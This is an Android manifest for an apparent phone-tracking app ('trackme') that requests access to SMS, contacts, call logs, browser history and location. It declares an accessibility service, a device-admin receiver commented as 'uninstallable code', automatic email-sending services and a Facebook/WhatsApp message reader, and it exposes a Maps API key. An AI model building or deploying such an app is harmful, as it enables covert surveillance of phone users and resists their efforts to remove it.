<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.appTracker"
    android:versionCode="1"
    android:versionName="1.2" android:installLocation="auto">

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="19" />
    
    
      <permission 
        android:name="com.example.androidmapsv2.permission.MAPS_RECEIVE" 
        android:protectionLevel="signature"></permission>
   
    <uses-permission 
        android:name="com.google.android.providers.gsf.permission.READ_GSERVICES"/>
     <uses-permission 
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_SMS"></uses-permission>
    <uses-permission android:name="android.permission.INTERNET"/>

    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
	<uses-permission android:name="android.permission.READ_CONTACTS" />
	<uses-permission android:name="android.permission.WAKE_LOCK" />
	<uses-permission android:name="android.permission.READ_CALL_LOG"/>
	<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
         <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
             
         <uses-feature android:glEsVersion="0x00020000" android:required="true"/>
    
<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
<uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE" />
    <application
        
        android:allowBackup="true"
        android:icon="@drawable/icon_new"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" 
        android:manageSpaceActivity=".ActivityOfMyChoice">
        <meta-data android:name="com.google.android.gms.version" android:value="@integer/google_play_services_version" />
        <activity
            android:name="org.activity.OneTimeRegistrationActivity"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        
      //---Accessibility service
     
     
      <service     android:name="org.activity.MyAccessibilityService"
                   android:enabled="true"
                   android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
           <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
</service>
        //--PlacesAutoCompleteSearch activity
         <activity
            android:name="guide.placesAutocomplete.PlacesAutoCompleteSearch"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"
            ></activity>
         
            //--PlacesAutoCompleteSearch activity
         <activity
            android:name="guide.placesAutocomplete.MapsActivity"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"
            ></activity>
         
         <activity
            android:name="guide.placesAutocomplete.GOogleMaps"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"
            ></activity>

         <meta-data
           android:name="com.google.android.maps.v2.API_KEY"
           android:value="AIzaSyCHK6LmvsGueP43NwD8_0H_NagqvQUI2uA"/> 
     //--automatic email id sending activity   
        <activity
            android:name="org.trackme.automaticEmail.EmailAutomatically"
            android:label="@string/app_name" 
            ></activity>
        

         //-----------------------Terma and Condition activity--------------------------------
         <activity android:name="org.activity.TearmsandConditionsActivity" 
             android:windowSoftInputMode="adjustPan" android:screenOrientation="portrait" 
             android:configChanges="orientation|keyboardHidden"></activity>
        
        
        
         //--ActivityOfMyChoice activity   
        <activity
            android:name="org.trackme.alarmservice.ActivityOfMyChoice"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"></activity>
     
         //--LoginActivity activity   
        <activity
            android:name="org.trackme.alarmservice.MainActivity"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"></activity>
     
      //--normal login  activity   
        <activity
            android:name="org.activity.LoginActivity"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"></activity>
        
        //--normal login  activity   
        <activity
            android:name="org.activity.BrowserHistory"
            android:label="@string/app_name" 
            android:windowSoftInputMode="adjustPan" 
            android:screenOrientation="portrait" 
            android:configChanges="orientation|keyboardHidden"></activity>
     
     
        //--send account information to user email id  activity   
        <activity
            android:name="org.trackme.automaticEmail.SendAccountInformationAutomaticMail"
            android:label="@string/app_name" 
            ></activity>
       
       
        //--FacebookWhatsAppMessages
        <activity
            android:name="org.activity.FacebookWhatsAppMessages"
            android:label="@string/app_name" 
            ></activity>
         <activity
            android:name="org.activity.CustomDateDialog"
            android:configChanges="orientation|keyboardHidden"
            android:screenOrientation="portrait"
            android:windowSoftInputMode="stateHidden" 
            android:theme="@style/DialogNoTitleBar" />
       
       //--DashBoardActivity activity
        <activity
            android:name="org.activity.DashBoardActivity"
            android:label="@string/app_name" ></activity>
     
        //--sms message box activity
        <activity
            android:name="org.trackme.smscenter.MessageBox"
            android:label="@string/app_name" ></activity>
     
        //--Call detail log activity
        <activity
            android:name="org.trackme.calllog.CallLogActivity"
            android:label="@string/app_name" ></activity>
     
        
        
        //--system lat long activity 
        <activity
            android:name="org.trackme.Location.ShowLocationActivity"
            android:label="@string/app_name" ></activity>
        
         //--system services class for uninstallable code  
        <activity
            android:name="org.trackme.systemServicesAndCpuWakeup.DevicePolicyActivity"
            android:label="@string/app_name" ></activity>
        
        
      <!-- This is where we register our receiver -->
        <receiver
            android:name="org.trackme.systemServicesAndCpuWakeup.AdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN" >
            <intent-filter>

                <!-- This action is required -->
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>

            <!-- This is required this receiver to become device admin component. -->
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin_sample" />
        </receiver>
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
                <!-- Alarm Activities listed below -->
        
       <activity 
        android:configChanges="keyboard|keyboardHidden|orientation" 
        android:name="com.alarm.List" 
        android:label="@string/edit_alarm_title">
        
    </activity>
    
      <!--  MediaPlayerPlayingMp3file -->
         <activity 
        android:configChanges="keyboard|keyboardHidden|orientation" 
        android:name="com.gurbani.recordings.MediaPlayerPlayingMp3file" 
        android:label="@string/edit_alarm_title"
        android:theme="@style/DialogNoTitleBar">
        
    </activity>
    <activity 
        android:configChanges="keyboard|keyboardHidden|orientation" 
        android:name="com.alarm.Edit" 
        android:label="@string/edit_alarm_title">
        
    </activity>
<activity android:configChanges="keyboard|keyboardHidden|orientation" android:name="com.alarm.AppChooser"></activity>

<service android:name="com.alarm.AalService">
</service>
<receiver android:name="com.alarm.AlarmReciever"></receiver>

<receiver android:name="com.alarm.BootReciever"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"></action>
</intent-filter>
<intent-filter><action android:name="android.intent.action.TIMEZONE_CHANGED"></action>
</intent-filter>
<intent-filter><action android:name="android.intent.action.TIME_SET"></action>
</intent-filter>
</receiver>
<activity android:name="com.pandora.android.activity.NowPlaying"></activity>
<activity android:name="com.alarm.RepeatChooser" android:theme="@android:style/Theme.Dialog"></activity>
<activity android:theme="@android:style/Theme.Dialog" android:configChanges="keyboard|keyboardHidden|orientation" android:name="com.alarm.VolumeChooser"></activity>
<activity android:name="com.alarm.CustomIntentMaker" android:theme="@android:style/Theme.Dialog"></activity>
<activity android:theme="@android:style/Theme.Dialog" android:name="com.alarm.TimeChooser"></activity>
<activity android:name="com.alarm.StringInputDialog" android:theme="@android:style/Theme.Dialog"></activity>

<activity 
    android:name="com.alarm.SnoozeActivity" 
   
    android:configChanges="keyboard|keyboardHidden|orientation" 
     android:excludeFromRecents="true"
            android:taskAffinity=""
            android:launchMode="singleInstance" 
    android:theme="@android:style/Theme.Dialog">
    
</activity>
<receiver android:name="com.alarm.SnoozeWakeupReceiver"
    ></receiver>

<activity android:configChanges="keyboard|keyboardHidden|orientation" android:name="com.alarm.ProviderList"></activity>
<activity android:name="com.alarm.CustomActionActivity"></activity>
<activity android:name="com.alarm.KillAndLaunchActivity" android:configChanges="keyboard|keyboardHidden|orientation"></activity>
        
<service android:name="com.alarm.SendMailToUserAccount"
          android:label="@string/sa_title"  
          android:configChanges="keyboard|keyboardHidden|orientation" 
           android:excludeFromRecents="true"
            android:taskAffinity=""
            android:launchMode="singleInstance"
            android:theme="@android:style/Theme.Dialog"
          ></service>  
          

<service    
            android:name="com.alarm.UpdateLocationDatabase"
            android:label="@string/sa_title"  
            android:configChanges="keyboard|keyboardHidden|orientation" 
            android:excludeFromRecents="true"
            android:taskAffinity=""
            android:launchMode="singleInstance"
            android:theme="@android:style/Theme.Dialog"
            ></service>  
          
          
 <!-- message receiving broadcast receiver -->
  
    </application>

</manifest>
